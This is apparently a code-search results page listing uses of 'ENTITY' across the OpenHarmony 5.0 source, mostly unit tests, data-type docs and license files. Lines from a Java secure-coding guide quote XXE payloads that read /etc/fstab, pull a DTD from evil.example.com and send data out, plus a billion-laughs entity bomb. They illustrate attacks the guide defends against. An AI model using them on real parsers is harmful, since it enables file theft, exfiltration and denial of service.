Home
last modified time | relevance | path

Searched refs:ENTITY (Results 1 – 25 of 32) sorted by relevance

12

/ohos5.0/foundation/distributeddatamgr/udmf/framework/innerkitsimpl/test/unittest/
H A Dfile_test.cpp64 UDType type = UDType::ENTITY;
80 UDType type = UDType::ENTITY;
H A Dapplication_defined_record_test.cpp92 UDType type = UDType::ENTITY;
107 UDType type = UDType::ENTITY;
H A Dsystem_defined_pixelmap_test.cpp77 UDType type = UDType::ENTITY;
93 UDType type = UDType::ENTITY;
H A Daudio_test.cpp62 UDType type = UDType::ENTITY;
H A Dfolder_test.cpp62 UDType type = UDType::ENTITY;
H A Dimage_test.cpp62 UDType type = UDType::ENTITY;
H A Dsystem_defined_form_test.cpp62 UDType type = UDType::ENTITY;
H A Dhtml_test.cpp131 UDType type = UDType::ENTITY;
H A Dlink_test.cpp63 UDType type = UDType::ENTITY;
/ohos5.0/docs/zh-cn/contribute/
H A DOpenHarmony-Java-secure-coding-guide.md1497 <!ENTITY file SYSTEM "file:///c:/xxx/xxx.ini"> ]>
1512 <!ENTITY % start "<![CDATA[">
1513 <!ENTITY % goodies SYSTEM "file:///etc/fstab">
1514 <!ENTITY % end "]]>">
1515 <!ENTITY % dtd SYSTEM "http://evil.example.com/combine.dtd">
1525 <!ENTITY all "%start;%goodies;%end;">
1532 <!ENTITY % send "<!ENTITY all SYSTEM 'http://mywebsite.com/?%gooddies;'>">
1648 <!ENTITY lol "lol">
1649 <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
1650 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
[all …]
/ohos5.0/base/notification/common_event_service/services/test/unittest/
H A Dcommon_event_unsubscribe_unit_test.cpp36 const std::string ENTITY = "com.ces.test.entity"; variable
169 matchingSkills.AddEntity(ENTITY);
H A Dcommon_event_dump_test.cpp36 const std::string ENTITY = "com.ces.test.entity"; variable
476 want.AddEntity(ENTITY); in SetPublishDataByOrdered()
500 want.AddEntity(ENTITY); in SetPublishDataByOrdered2()
524 want.AddEntity(ENTITY); in SetPublishDataByUnordered()
549 matchingSkills.AddEntity(ENTITY); in SubscribeDoubleEvent()
572 want.AddEntity(ENTITY); in PublishUnorderedEvent()
607 want.AddEntity(ENTITY); in PublishStickyEvent()
641 want.AddEntity(ENTITY); in PublishStickyEvent()
1166 matchingSkills.AddEntity(ENTITY);
1220 matchingSkills.AddEntity(ENTITY);
H A Dcommon_event_subscribe_unit_test.cpp43 const std::string ENTITY = "com.ces.test.entity"; variable
843 matchingSkills.AddEvent(ENTITY);
/ohos5.0/docs/zh-cn/application-dev/reference/apis-arkdata/
H A Dudmf__meta_8h.md93 …_META_GENERAL_FILE](_u_d_m_f.md#udmf_meta_general_file) "general.file" | 所有文件的基类型,归属类型为ENTITY。 |
94 …F_META_DIRECTORY](_u_d_m_f.md#udmf_meta_directory) "general.directory" | 所有目录的基类型,归属类型为ENTITY。 |
96 | [UDMF_META_SYMLINK](_u_d_m_f.md#udmf_meta_symlink) "general.symlink" | 所有符号链接的基类型,归属类型为ENTITY。 …
H A Djs-apis-data-uniformTypeDescriptor.md24 | ENTITY<sup>11+</sup> | 'general.entity' | 所有表示物理存储类型的基类型,…
131 | FILE | 'general.file' | 所有文件的基类型,归属类型为ENTITY。<br>**原子化服务API…
132 | DIRECTORY<sup>11+</sup> | 'general.directory' | 所有目录的基类型,归属类型为ENTITY。 …
134 | SYMLINK<sup>11+</sup> | 'general.symlink' | 所有符号链接的基类型,归属类型为ENTITY。 …
H A D_u_d_m_f.md99 | [UDMF_META_GENERAL_FILE](#udmf_meta_general_file) "general.file" | 所有文件的基类型,归属类型为ENTITY。 |
100 | [UDMF_META_DIRECTORY](#udmf_meta_directory) "general.directory" | 所有目录的基类型,归属类型为ENTITY。 |
102 | [UDMF_META_SYMLINK](#udmf_meta_symlink) "general.symlink" | 所有符号链接的基类型,归属类型为ENTITY。 |
661 所有目录的基类型,归属类型为ENTITY
843 所有文件的基类型,归属类型为ENTITY
1805 所有符号链接的基类型,归属类型为ENTITY
/ohos5.0/foundation/distributeddatamgr/udmf/framework/innerkitsimpl/common/
H A Dunified_meta.cpp25 { ENTITY, "ENTITY", "general.entity" },
552 return value >= ENTITY && value < UD_BUTT; in IsValidType()
/ohos5.0/docs/en/contribute/
H A DOpenHarmony-Java-secure-coding-guide.md1489 <!ENTITY file SYSTEM "file:///c:/xxx/xxx.ini"> ]>
1504 <!ENTITY % start "<![CDATA[">
1505 <!ENTITY % goodies SYSTEM "file:///etc/fstab">
1506 <!ENTITY % end "]]>">
1507 <!ENTITY % dtd SYSTEM "http://evil.example.com/combine.dtd">
1517 <!ENTITY all "%start;%goodies;%end;">
1524 <!ENTITY % send "<!ENTITY all SYSTEM 'http://mywebsite.com/?%gooddies;'>">
1640 <!ENTITY lol "lol">
1641 <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
1642 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
[all …]
/ohos5.0/foundation/distributeddatamgr/udmf/framework/common/
H A Dudmf_types_util.cpp169 if (type < ENTITY || type >= UD_BUTT) { in Unmarshalling()
/ohos5.0/base/global/system_resources/
H A DLICENSE_Fonts8 …LEGAL AGREEMENT BETWEEN YOU (EITHER A SINGLE INDIVIDUAL, OR SINGLE LEGAL ENTITY) AND HUAWEI DEVICE…
/ohos5.0/base/update/updater/resources/font/
H A DLICENSE_Fonts8 …LEGAL AGREEMENT BETWEEN YOU (EITHER A SINGLE INDIVIDUAL, OR SINGLE LEGAL ENTITY) AND HUAWEI DEVICE…
/ohos5.0/docs/en/application-dev/reference/apis-arkdata/
H A Dudmf__meta_8h.md93 …udmf_meta_general_file) "general.file" | Generic file type.<br>This type belongs to **ENTITY**.|
94 …ta_directory) "general.directory" | Generic directory type.<br>This type belongs to **ENTITY**.|
96 …mf_meta_symlink) "general.symlink" | Generic symbolic type.<br>This type belongs to **ENTITY**.|
H A Djs-apis-data-uniformTypeDescriptor.md24 | ENTITY<sup>11+</sup> | 'general.entity' | Generic physica…
131 …ral.file' | Generic file type.<br>This type belongs to **ENTITY**.<br>**Atomic ser…
132 …ctory' | Generic directory type.<br>This type belongs to **ENTITY**. …
134 …ral.symlink' | Generic symbolic type.<br>This type belongs to **ENTITY**. …
/ohos5.0/foundation/distributeddatamgr/udmf/interfaces/innerkits/common/
H A Dunified_meta.h69 ENTITY = 0, enumerator
/ohos5.0/foundation/bundlemanager/bundle_framework/services/bundlemgr/test/unittest/bms_bundle_kit_service_base_test/
H A Dbms_bundle_kit_service_base_test.cpp54 const std::string ENTITY = "entity.system.home"; variable
171 skill.entities = {ENTITY}; in MockInstallBundle()

12